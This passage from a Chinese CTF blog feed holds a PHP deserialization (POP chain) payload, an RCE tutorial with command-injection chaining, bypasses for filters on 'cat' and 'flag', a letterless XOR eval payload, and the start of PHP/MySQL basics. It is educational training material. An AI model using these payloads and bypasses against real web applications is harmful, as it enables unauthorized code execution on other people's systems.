plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D</span><br></pre></td></tr></table></figure><p>然后得到flag。</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/19/pop%E9%93%BE%E6%9E%84%E9%80%A0/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/19/pop%E9%93%BE%E6%9E%84%E9%80%A0/"/>
    <published>2026-02-19T08:41:25.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>pop链构造</title>
    <updated>2026-02-19T13:36:54.323Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="rce漏洞原理及利用"><a class="markdownIt-Anchor" href="#rce漏洞原理及利用"></a> RCE漏洞原理及利用</h1><p>引路题QAQ:NSSCTF-[SWPUCTF 2021 新生赛]babyrce,<s>窝的博客里题解部分也有详解嘿嘿</s>（）</p><h2 id="一-rce漏洞概述"><a class="markdownIt-Anchor" href="#一-rce漏洞概述"></a> 一、RCE漏洞概述</h2><p>web的应用开发中常常为了灵活性与简洁性，让应用调用代码执行函数或系统命令执行函数处理，如果对用户输入过滤不严，容易产生远程代码执行漏洞或命令执行漏洞。</p><p>RCE漏洞分为两类：</p><p>远程命令执行漏洞(Remote Command Execution)和远程代码执行漏洞(Remote Code Execution)</p><p>它们的成因分别为：</p><p>应用程序需要调用外部操作系统命令来完成特定功能（例如，网络诊断工具中的 <code>ping</code> 或 <code>traceroute</code>，文件处理，系统管理任务）。如果应用程序将用户可控的输入（如 IP 地址、文件名、搜索词等）直接或不安全地嵌入到将要执行的命令字符串中，攻击者就可以注入额外的命令。</p><p>应用程序使用了能将字符串作为代码执行的函数（如 PHP 中的 <code>eval()</code>、<code>assert()</code>，Python 中的 <code>exec()</code>），并且将用户可控的输入传递给了这些函数。或者，存在反序列化漏洞、模板注入、不安全的文件包含等，允许用户输入影响代码执行流。</p><h2 id="二-常见的rce漏洞函数"><a class="markdownIt-Anchor" href="#二-常见的rce漏洞函数"></a> 二、常见的RCE漏洞函数</h2><h3 id="1系统命令执行函数"><a class="markdownIt-Anchor" href="#1系统命令执行函数"></a> 1.系统命令执行函数</h3><p>1).system() ;这个相信大家都不陌生(抬头不见低头见)，能将字符串作为命令执行并返回结果；</p><p>2).exec() ; 也能将字符串作为命令执行，但是只能返回结果的最后一行(至今不知道有什么用emmmmmm)；</p><p>3).shell_exec() ; 能执行命令但不返回结果；</p><p>4).passthru(); 能将字符串作为命令执行，只调用命令不返回任何结果，但把命令的运行结果原样输出到标准输出设备上(这里指的是命令的执行状态，0代表成功，非0代表失败)</p><p>二编<strong>warnings：system不需要提供output函数，他是直接把结果返回出来，同样return_var是执行的状态码</strong>；</p><p><strong>而exec函数需要提供$output函数才能，且返回的数据是array类型</strong>；</p><p><strong>shell_exec则与exec类似</strong>。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">system()    #　语法 : system(string $command, int &amp;$result_code = null)</span><br><span class="line">eval()        #语法：eval(string $code) 把字符串作为PHP代码执行</span><br><span class="line">passthru() #语法：passthru(string $command, int &amp;$result_code = null)</span><br><span class="line">exec()         #语法：exec(string $command, array &amp;$output = null, int &amp;$result_code = null)</span><br><span class="line">shell_exec() #语法：shell_exec(string $command),通过 shell 执行命令并将完整的输出以字符串的方式返回</span><br><span class="line">popen()         #popen(string $command, string $mode),打开指向进程的管道，进程由派生给定的 command 命令执行产生。</span><br><span class="line">proc_open()     #比popen更加灵活</span><br><span class="line">pcntl_exec()    #bool pcntl_exec(string $path, array $args = null, array $env = null)</span><br></pre></td></tr></table></figure><h2 id="三-具体利用"><a class="markdownIt-Anchor" href="#三-具体利用"></a> 三、具体利用</h2><h3 id="1文件包含"><a class="markdownIt-Anchor" href="#1文件包含"></a> 1.文件包含</h3><p>对于文件包含所常用的命令拼接方式:</p><p>1)使用（<strong>;</strong>）分隔</p><p>eg.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c1;c2;c3</span><br></pre></td></tr></table></figure><p>无论c1是否成立，该语句都会按顺序依次执行所有命令。</p><p>2)使用逻辑与 (<code>&amp;&amp;</code>) 和逻辑或 (<code>||</code>)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">c1&amp;&amp;c2  //只有当左边的命令成功执行（返回状态码为 0）时，才会执行右边的命令。</span><br><span class="line">c1||c2  //只有当左边的命令执行失败（返回状态码非 0）时，才会执行右边的命令。</span><br></pre></td></tr></table></figure><p>3)命令替换</p><p><strong><code>$( ... )</code></strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c1 $(c2)</span><br></pre></td></tr></table></figure><p>命令替换会将命令的输出替换到当前命令中。</p><h3 id="2绕过技巧"><a class="markdownIt-Anchor" href="#2绕过技巧"></a> 2.绕过技巧</h3><h4 id="过滤cat"><a class="markdownIt-Anchor" href="#过滤cat"></a> 过滤cat</h4><p>用类似命令代替：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">tac</span>：反向查看。</span><br><span class="line"></span><br><span class="line">more：逐页显示文档。</span><br><span class="line"></span><br><span class="line">less：逐页显示文档。</span><br><span class="line"></span><br><span class="line"><span class="built_in">tail</span>：查看末尾几行。</span><br><span class="line"></span><br><span class="line"><span class="built_in">nl</span>：带行号显示。</span><br><span class="line"></span><br><span class="line"><span class="built_in">od</span>：二进制读取。</span><br><span class="line"></span><br><span class="line">xxd：二进制读取。</span><br><span class="line"></span><br><span class="line"><span class="built_in">sort</span>：排序文件。</span><br><span class="line"></span><br><span class="line"><span class="built_in">uniq</span>：报错相关。</span><br><span class="line"></span><br><span class="line">file -f：报错相关。#passthru(<span class="string">&quot;file -f /flag&quot;</span>);</span><br><span class="line"></span><br><span class="line">grep str file：在file中读取str</span><br><span class="line"></span><br><span class="line">rev：反向读取,eg:FSCTF&#123;c0ng2atu1ati0ns_y0u_a2e_go0D!&#125;会读取为：&#125;!D0og_e2a_u0y_sn0ita1uta2gn0c&#123;FTCSF</span><br><span class="line"></span><br><span class="line">strings/paste: 也是读取文件内容</span><br></pre></td></tr></table></figure><p>eg.[FSCTF 2023]Hello,you</p><p>这题就是经典的cat过滤，我们在注入<code>fla*</code>通配符时回显flag.php;我们尝试cat被拦截后使用<code> ; more fla*</code>，成功得到flag。</p><h4 id="过滤flag"><a class="markdownIt-Anchor" href="#过滤flag"></a> 过滤flag</h4><ul><li>通配符绕过：</li><li><code>?</code>：代表单个字符。</li><li><code>*</code> ：模糊匹配，代表任意字符串。 如：cat fla*或者cat fla?</li><li>或者用反斜线绕过</li></ul><p>如：cat fla\g</p><ul><li>单引号或者双引号绕过 如cat f’‘lag或者cat f’‘l’‘a’'g</li></ul><h3 id="3无字母rce"><a class="markdownIt-Anchor" href="#3无字母rce"></a> 3.无字母RCE</h3><p>eg.[HUBUCTF 2022 新生赛]HowToGetShell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$mess=$_POST[&#x27;mess&#x27;];</span><br><span class="line">if(preg_match(&quot;/[a-zA-Z]/&quot;,$mess))&#123;</span><br><span class="line">  die(&quot;invalid input!&quot;);</span><br><span class="line">&#125;</span><br><span class="line">eval($mess);</span><br></pre></td></tr></table></figure><p>首先我们明确思路，我们的核心目的就是<strong>不使用字母、数字，去构造诸如 <code>assert</code>、<code>system</code> 函数的字符串</strong>，然后利用动态执行的方法进行调用。</p><p>我们就能想到异或，构造payload如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mess=$_=(&#x27;%01&#x27;^&#x27;`&#x27;).(&#x27;%13&#x27;^&#x27;`&#x27;).(&#x27;%13&#x27;^&#x27;`&#x27;).(&#x27;%05&#x27;^&#x27;`&#x27;).(&#x27;%12&#x27;^&#x27;`&#x27;).(&#x27;%14&#x27;^&#x27;`&#x27;);$__=&#x27;_&#x27;.(&#x27;%0D&#x27;^&#x27;]&#x27;).(&#x27;%2F&#x27;^&#x27;`&#x27;).(&#x27;%0E&#x27;^&#x27;]&#x27;).(&#x27;%09&#x27;^&#x27;]&#x27;);$___=$$__;$_($___[_]);</span><br><span class="line">&amp;_=phpinfo();</span><br></pre></td></tr></table></figure><p>除了异或外，我还在网上看到了一些其他的思路：</p><p>方法二 取反</p><p>该方法利用的是UTF-8编码的某个汉字，并将其中某个字符取出来。</p><p>可以看到，当我们对一个<strong>中文取反的话会返回大小写字母以及特殊字符</strong>，那么我们配合索引进行取值即可，<code>帅</code>字在 UTF-8 编码中占用了3个字节，具体的UTF编码为: <code>\xe5\xb8\x85</code>, php 将字符串视为字节数组，所以在PHP中可以将其看做是包含三个字节的数组。</p><p>使用 <code>帅[1]</code> 的结果是 <code>\xb8</code> 经过取反之后得到字母 <code>G</code>。</p><p>具体取反过程如下:</p><ul><li><p>先将十六进制 <code>b8</code> 转为二进制。</p></li><li><p>再将 <code>b8</code> 的二进制进行按位取反，0变成1,1变成0。</p></li><li><p>最后再将得到的二进制转为十进制与<code>ASCII</code>表中进行比对，最终找到字母 <code>G</code>。</p><p>获取字符的脚本:</p></li></ul><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">// 从文件中获取汉字</span><br><span class="line">$content = file_get_contents(&#x27;data.txt&#x27;); </span><br><span class="line">$content_length = mb_strlen($content, &quot;UTF-8&quot;);</span><br><span class="line">// 要获取的字符</span><br><span class="line">$payload = &quot;a&quot;;  </span><br><span class="line">// 使用 for 循环逐个输出中文字符</span><br><span class="line">for ($i = 0; $i &lt; $content_length; $i++) &#123;</span><br><span class="line">    // 获取当前字符</span><br><span class="line">    $char = mb_substr($content, $i, 1, &quot;UTF-8&quot;);</span><br><span class="line">    // 输出中文字符（排除换行符等非中文字符）</span><br><span class="line">    if ($char != &quot;\n&quot; &amp;&amp; $char != &quot;\r&quot; &amp;&amp; $char != &quot;\t&quot; &amp;&amp; $char != &#x27;，&#x27; &amp;&amp; $char != &#x27;。&#x27; &amp;&amp; $char != &quot;？&quot; &amp;&amp; $char != &quot;“&quot; &amp;&amp; $char != &quot;”&quot; &amp;&amp; $char != &quot;《&quot; &amp;&amp; $char != &quot;》&quot; &amp;&amp; $char != &quot;、&quot;) &#123;</span><br><span class="line">        for ($j = 1; $j &lt;= 4; $j ++) &#123;</span><br><span class="line">            if (~$char[$j] == $payload) &#123;</span><br><span class="line">                echo &quot;~&#x27;$char&#x27;&quot; . &quot;[$j]&quot; . &quot;\n&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>脚本来源：<a href="https://www.qwesec.com/2024/03/noLettersOrNumbersRCE.html">(<em><sup>▽</sup></em>)</a></p><h3 id="4无参rce"><a class="markdownIt-Anchor" href="#4无参rce"></a> 4.无参RCE</h3><p>可能用的到的函数</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">localeconv() – 函数返回一个包含本地数字及货币格式信息的数组 第一个是.</span><br><span class="line"></span><br><span class="line">pos() – 返回数组中的当前单元, 默认取第一个值</span><br><span class="line"></span><br><span class="line">next – 将内部指针指向数组下一个元素并输出</span><br><span class="line"></span><br><span class="line">scandir() – 扫描目录</span><br><span class="line"></span><br><span class="line">array_reverse() – 翻转数组</span><br><span class="line"></span><br><span class="line">array_flip() - 键名与数组值对调</span><br><span class="line"></span><br><span class="line">readfile()</span><br><span class="line"></span><br><span class="line">array_rand() - 随机读取键名</span><br><span class="line"></span><br><span class="line">var_dump() - 输出数组，可以用print_r替代</span><br><span class="line"></span><br><span class="line">file_get_contents() - 读取文件内容，show_source,highlight_file echo 可代替</span><br><span class="line"></span><br><span class="line">get_defined_vars() -  返回由所有已定义变量所组成的数组</span><br><span class="line"></span><br><span class="line">end() - 读取数组最后一个元素</span><br><span class="line"></span><br><span class="line">current() - 读取数组的第一个元素</span><br><span class="line"></span><br><span class="line">#php内置函数</span><br></pre></td></tr></table></figure><p>eg.[HNCTF 2022 WEEK2]Canyource</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/15/RCE%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/15/RCE%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8/"/>
    <published>2026-02-15T13:13:09.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>RCE漏洞原理及利用</title>
    <updated>2026-03-12T07:02:53.198Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="PHP" scheme="https://cl1ck-t0.github.io/tags/PHP/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="phpmysql基础"><a class="markdownIt-Anchor" href="#phpmysql基础"></a> PHP&amp;MySQL基础</h1><h2 id="一php"><a class="markdownIt-Anchor" href="#一php"></a> 一.PHP</h2><h3 id="1变量"><a class="markdownIt-Anchor" href="#1变量"></a> 1.变量</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$name = &quot;原神&quot;;</span><br><span class="line">$age = 5;</span><br><span class="line">$isnb = true;</span><br></pre></td></tr></table></figure><p>1.变量规则</p><p>变量以$符号开头，其后是变量的名称；</p><p>变量名必须以字母或下划线开头；</p><p>变量名只能包含字母数字字符和下划线，且对大小写敏感；</p><p>$起到定义变量的作用。</p><p>2.变量作用域</p><p>在PHP中，可以在脚本的任意位置对变量进行声明</p><p>变量的作用域指的是变量能够被引用的那部分脚本。</p><p>PHP有三种不同的变量作用域：</p><p>local（局部）</p><p>global（全局）</p><p>static（静态）</p><h3 id="2逻辑判断"><a class="markdownIt-Anchor" href="#2逻辑判断"></a> 2.逻辑判断</h3><p>和C语言一样，不加以赘述。</p><h3 id="3常用函数"><a class="markdownIt-Anchor" href="#3常用函数"></a> 3.常用函数</h3><p>1.字符串函数</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$str = &quot;Hello World&quot;;</span><br><span class="line"></span><br><span class="line">strlen($str);           // 获取字符串长度：11</span><br><span class="line">strpos($str, &quot;World&quot;);  // 查找子串位置：6</span><br><span class="line">substr($str, 0, 5);     // 截取子串：&quot;Hello&quot;</span><br><span class="line">str_replace(&quot;World&quot;, &quot;PHP&quot;, $str);  // 替换：&quot;Hello PHP&quot;</span><br><span class="line">trim($str);             // 去除首尾空格</span><br><span class="line">strtolower($str);       // 转小写：&quot;hello world&quot;</span><br><span class="line">strtoupper($str);       // 转大写：&quot;HELLO WORLD&quot;</span><br><span class="line">explode(&quot; &quot;, $str);      // 分割字符串：[&quot;Hello&quot;, &quot;World&quot;]</span><br><span class="line">implode(&quot;,&quot;, $arr);      // 连接数组元素</span><br><span class="line">htmlspecialchars($str);  // 转义HTML特殊字符（防XSS攻击）</span><br></pre></td></tr></table></figure><p>2.数组函数</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$arr = [1, 2, 3, 4, 5];</span><br><span class="line"></span><br><span class="line">count($arr);            // 数组长度：5</span><br><span class="line">in_array(3, $arr);      // 检查值是否存在：true</span><br><span class="line">array_push($arr, 6);    // 尾部添加元素</span><br><span class="line">array_pop($arr);        // 弹出尾部元素</span><br><span class="line">array_merge($arr1, $arr2);  // 合并数组</span><br><span class="line">array_keys($arr);       // 获取所有键名</span><br><span class="line">array_values($arr);     // 获取所有值</span><br><span class="line">sort($arr);             // 排序</span><br><span class="line">isset($arr[&#x27;key&#x27;]);     // 检查键是否存在</span><br><span class="line">unset($arr[2]);         // 删除元素</span><br></pre></td></tr></table></figure><p>3.文件和目录函数</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">file_exists(&quot;test.txt&quot;);    // 检查文件是否存在</span><br><span class="line">file_get_contents(&quot;test.txt&quot;);  // 读取文件内容</span><br><span class="line">file_put_contents(&quot;test.txt&quot;, &quot;内容&quot;);  // 写入文件</span><br><span class="line">fopen(&quot;test.txt&quot;, &quot;r&quot;);     // 打开文件</span><br><span class="line">fclose($handle);            // 关闭文件</span><br><span class="line">fgets($handle);             // 读取一行</span><br><span class="line">is_dir(&quot;path&quot;);             // 检查是否是目录</span><br><span class="line">mkdir(&quot;newdir&quot;);            // 创建目录</span><br></pre></td></tr></table></figure><h2 id="二mysql"><a class="markdownIt-Anchor" href="#二mysql"></a> 二.MySQL</h2><h3 id="1数据库"><a class="markdownIt-Anchor" href="#1数据库"></a> 1.数据库</h3><p>数据库是<strong>按照数据结构来组织、存储和管理数据的仓库</strong>。可以把它想象成一个电子化的文件柜，能够高效地存储和检索数据。</p><p>关系型数据库的核心概念</p><ul><li><strong>表（Table）</strong>：类似Excel表格，由行和列组成</li><li><strong>行（Row/Record）</strong>：表中的一条记录</li><li><strong>列（Column/Field）</strong>：表的一个字段</li><li><strong>主键（Primary Key）</strong>：唯一标识一条记录的字段</li><li><strong>外键（Foreign Key）</strong>：关联其他表的字段</li><li><strong>索引（Index）</strong>：提高查询速度的结构</li></ul><h3 id="2select查询语句"><a class="markdownIt-Anchor" href="#2select查询语句"></a> 2.SELECT查询语句</h3><h4 id="1-基本select语法"><a class="markdownIt-Anchor" href="#1-基本select语法"></a> 1. 基本SELECT语法</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">-- 最简单的SELECT</span><br><span class="line">SELECT * FROM users;</span><br><span class="line"></span><br><span class="line">-- 选择特定列</span><br><span class="line">SELECT username, email, age FROM users;</span><br><span class="line"></span><br><span class="line">-- 使用别名</span><br><span class="line">SELECT </span><br><span class="line">    username AS 用户名,</span><br><span class="line">    email AS 邮箱,</span><br><span class="line">    age AS 年龄</span><br><span class="line">FROM users;</span><br><span class="line"></span><br><span class="line">-- 去重查询</span><br><span class="line">SELECT DISTINCT city FROM users;</span><br></pre></td></tr></table></figure><h4 id="2-select子句完整结构"><a class="markdownIt-Anchor" href="#2-select子句完整结构"></a> 2. SELECT子句完整结构</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">SELECT [DISTINCT] 列名1, 列名2, ...</span><br><span class="line">FROM 表名</span><br><span class="line">[WHERE 条件]</span><br><span class="line">[GROUP BY 列名]</span><br><span class="line">[HAVING 分组条件]</span><br><span class="line">[ORDER BY 列名 [ASC|DESC]]</span><br><span class="line">[LIMIT 偏移量, 数量];</span><br></pre></td></tr></table></figure><h4 id="3-常用函数和表达式"><a class="markdownIt-Anchor" href="#3-常用函数和表达式"></a> 3. 常用函数和表达式</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">-- 数学函数</span><br><span class="line">SELECT </span><br><span class="line">    price,</span><br><span class="line">    ROUND(price, 2) AS 四舍五入,</span><br><span class="line">    CEIL(price) AS 向上取整,</span><br><span class="line">    FLOOR(price) AS 向下取整,</span><br><span class="line">    ABS(price) AS 绝对值</span><br><span class="line">FROM products;</span><br><span class="line"></span><br><span class="line">-- 字符串函数</span><br><span class="line">SELECT </span><br><span class="line">    username,</span><br><span class="line">    CONCAT(first_name, &#x27; &#x27;, last_name) AS 全名,</span><br><span class="line">    LENGTH(username) AS 长度,</span><br><span class="line">    UPPER(email) AS 大写邮箱,</span><br><span class="line">    SUBSTRING(phone, 1, 3) AS 电话前缀</span><br><span class="line">FROM users;</span><br><span class="line"></span><br><span class="line">-- 日期函数</span><br><span class="line">SELECT </span><br><span class="line">    created_at,</span><br><span class="line">    YEAR(created_at) AS 年份,</span><br><span class="line">    MONTH(created_at) AS 月份,</span><br><span class="line">    DAY(created_at) AS 日期,</span><br><span class="line">    DATE_FORMAT(created_at, &#x27;%Y-%m-%d&#x27;) AS 格式化日期,</span><br><span class="line">    DATEDIFF(NOW(), created_at) AS 注册天数</span><br><span class="line">FROM users;</span><br><span class="line"></span><br><span class="line">-- 聚合函数</span><br><span class="line">SELECT </span><br><span class="line">    COUNT(*) AS 总用户数,</span><br><span class="line">    AVG(age) AS 平均年龄,</span><br><span class="line">    MAX(age) AS 最大年龄,</span><br><span class="line">    MIN(age) AS 最小年龄,</span><br><span class="line">    SUM(salary) AS 工资总和</span><br><span class="line">FROM users;</span><br></pre></td></tr></table></figure><h3 id="3where条件子句sql注入的基础"><a class="markdownIt-Anchor" href="#3where条件子句sql注入的基础"></a> 3.WHERE条件子句（SQL注入的基础）</h3><h4 id="1-基本比较运算符"><a class="markdownIt-Anchor" href="#1-基本比较运算符"></a> 1. 基本比较运算符</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">-- 等于</span><br><span class="line">SELECT * FROM users WHERE username = &#x27;admin&#x27;;</span><br><span class="line"></span><br><span class="line">-- 不等于</span><br><span class="line">SELECT * FROM users WHERE status != &#x27;disabled&#x27;;</span><br><span class="line"></span><br><span class="line">-- 大于/小于</span><br><span class="line">SELECT * FROM products WHERE price &gt; 100;</span><br><span class="line">SELECT * FROM products WHERE price &lt; 50;</span><br><span class="line"></span><br><span class="line">-- 大于等于/小于等于</span><br><span class="line">SELECT * FROM orders WHERE amount &gt;= 1000;</span><br><span class="line">SELECT * FROM products WHERE stock &lt;= 10;</span><br></pre></td></tr></table></figure><h4 id="2-逻辑运算符"><a class="markdownIt-Anchor" href="#2-逻辑运算符"></a> 2. 逻辑运算符</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">-- AND（与）</span><br><span class="line">SELECT * FROM users </span><br><span class="line">WHERE age &gt;= 18 </span><br><span class="line">  AND age &lt;= 60 </span><br><span class="line">  AND status = &#x27;active&#x27;;</span><br><span class="line"></span><br><span class="line">-- OR（或）</span><br><span class="line">SELECT * FROM products </span><br><span class="line">WHERE category = &#x27;电子产品&#x27; </span><br><span class="line">   OR category = &#x27;家电&#x27;;</span><br><span class="line"></span><br><span class="line">-- NOT（非）</span><br><span class="line">SELECT * FROM users </span><br><span class="line">WHERE NOT status = &#x27;banned&#x27;;</span><br><span class="line"></span><br><span class="line">-- 组合使用（注意括号）</span><br><span class="line">SELECT * FROM orders </span><br><span class="line">WHERE (status = &#x27;pending&#x27; OR status = &#x27;processing&#x27;)</span><br><span class="line">  AND amount &gt; 100;</span><br></pre></td></tr></table></figure><h4 id="3-特殊条件查询"><a class="markdownIt-Anchor" href="#3-特殊条件查询"></a> 3. 特殊条件查询</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">-- IN 范围查询</span><br><span class="line">SELECT * FROM users </span><br><span class="line">WHERE city IN (&#x27;北京&#x27;, 